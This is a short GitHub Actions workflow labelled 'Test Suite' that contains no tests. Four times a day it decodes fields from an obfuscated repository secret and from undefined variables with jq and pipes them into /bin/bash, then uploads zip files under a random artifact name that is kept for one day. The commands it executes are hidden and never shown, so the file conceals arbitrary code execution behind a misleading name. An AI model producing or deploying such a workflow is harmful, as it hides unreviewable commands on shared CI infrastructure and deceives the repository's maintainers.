name: Test Suite
on:
  workflow_dispatch:

  schedule:
    - cron: '58 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          xankr5128: ${{ secrets.xankr5128 }}
        run: |
          printf '%s' "$xankr5128" | jq -r .h115 | /bin/bash
          echo $hksb69 | jq -r .dmnyo99763 | /bin/bash
          printf '%s' "$tkc87416" | jq -r .arkz63 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: aSAWrbSp
          path: "*.zip"
          retention-days: 1
